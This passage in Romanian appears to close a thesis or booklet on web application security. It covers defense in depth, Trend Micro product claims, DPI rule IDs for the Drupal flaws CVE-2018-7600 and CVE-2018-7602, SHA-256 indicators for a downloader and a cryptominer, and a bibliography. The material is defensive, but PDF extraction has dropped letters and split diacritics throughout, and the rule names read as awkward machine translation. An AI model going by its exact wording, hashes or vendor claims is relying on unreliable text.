O vulnerabilitate unic a^ ntr-un site web sau^ ntr-o aplicat ,ie ar putea provoca o^ nc alcare
sau o ^ ntrerupere a datelor. Organizat ,iile pot s a atent ,ioneze ^ n continuare amenint , arile de
acest gen prin ap ararea ^ n profunzime: aplicarea principiului celor mai put ,in privilegiate
s,i ad augarea mai multor straturi de securitate, cum ar  patch-urile virtuale, rewall-
urile, sistemele de detectare s ,i prevenire a intruziunilor, precum s ,i controlul aplicat ,iilor s ,i
monitorizarea comportamentului.
Solut ,ii Trend Micro
O abordare proactiv a, multistraticat a a securit at ,ii este cheia ^ mpotriva amenint , arilor
care exploateaz a vulnerabilit at ,ile – de la poarta de acces, punctele nale, ret ,elele s ,i ser-
verele. Trend Micro Deep Security s ,i protect ,ia ^ mpotriva vulnerabilit at ,ii Trend Micro
—ofer a, de asemenea, patch-uri virtuale care protejeaz a serverele s ,i punctele nale de
amenint , arile care violeaz a vulnerabilit at ,ile ^ n aplicat ,ii sau site-uri critice, cum ar  cele
care folosesc Drupal. Trend Micro —, OceScan —cu securitatea XGen —pentru endpoint
are Protect ,ia Vulnerabilit at ,ii care protejeaz a puncte nale de vulnerabilit at ,ile identi-
cate s ,i necunoscute, chiar ^ nainte ca patch-urile s a e chiar implementate. Trend Micro
—Smart Protection Suites s ,i Worry-Free —Business Security protejeaz a utilizatorii s ,i
companiile de aceste amenint , ari prin detectarea s ,i blocarea s ,ierelor r au intent ,ionate s ,i a
tuturor adreselor URL malitioase conexe. Solut ,ia Trend Micro —Smart Home Network
protejeaz a client ,ii prin intermediul acestor reguli DPI:
1134569 – Executarea execut ,iei codului de baz a Drupal pe baza WEB-ului WEB -1.1
(CVE-2018-7600)
1134571 – Executarea codului de formare Drupal pe baz a de WEB-ului WEB -1.2 (CVE-
2018-7600)
1134572 – Executarea execut ,iei codului de baz a Drupal pe baz a de WEB WEB-1.3.3
(CVE-2018-7600)
1134790 – WEB Drupal Core drupalgeddon3 Executarea codului de la distant , a autenti-
cat -2 (CVE-2018-7602)
Solut ,iile de protect ,ie ^ mpotriva vulnerabilit at ,ii Trend Micro Deep Security s ,i Trend Micro
41

—protejeaz a sistemele utilizatorilor ^ mpotriva oric aror amenint , ari care pot viza vulnera-
bilit at ,ile ment ,ionate mai sus prin urm atoarea regul a DPI9:
1009054 – Vulnerabilitatea execut ,iei codului de la distant , a Drupal Core (CVE-2018-
7602)
Indicatori de compromis (IoC):
Ceasuri ^ nrudite (SHA-256):
Detectat ca "ELF_DLOADR.DHG":
a1d8bfc17bf395742e4c8a81ca0ba352b998c1590ac2fb014aa23671b2ee6302
01147a014378711ee299de7b37ac0a262a1ac22011a510bdf9ad0c93695827b
Detectat ca "COINMINER_TOOLXMR.O-ELF64":
89cdf303dc94e56dacc4e894d44c54845e4658a0dc5b32d50b0650a67f92d5b3
9Deep Packet Inspection
42

Bibliograe
1. "Testing and Comparing Web Vulnerability Scanning Tools for SQL Injection and
XSS Attacks". Fonseca, J.; Vieira, M.; Madeira, H., Dependable Computing, IEEE.
Dec 2007.
2. "2012 Trends Report: Application Security Risks". Cenzic, Inc. 11 March 2012.
Retrieved 9 July 2012.
3. "Latest OWASP Top 10 looks at APIs, web apps" Korolov, Maria (Apr 27, 2017).
4. "Systematic review of web application security development model". Shuaibu, Bala
Musa; Norwawi, Norita Md; Selamat, Mohd Hasan; Al-Alwani, Abdulkareem (2013-
01-17).
5. "Web application rewalls for security and regulatory compliance". TestingXperts
Blog. March 2017.
6. "Why It s Insane to Trust Static Analysis". Williams, Je (22 September 2015).
7. "Design & Research on Vulnerability Databases": Yun-Hua, G; Pei, L (2010).
8. "Common Vulnerability Scoring System". IEEE Security and Privacy Magazine.
Mell, P; Romanosky, S (2006).
9. "Generation of Sql-injection Free Secure Algorithm to Detect and Prevent Sql-
Injection Attacks". Procedia Technology. Natarajan, K; Subramani, S (2012).
10. "Vulnerability Database – Top 1000 Flaws". Network Security 2001.
11. "Continuous Security in a DevOps World=5 July 2016". RMLL Conference 2016.
Retrieved 4 July 2018
43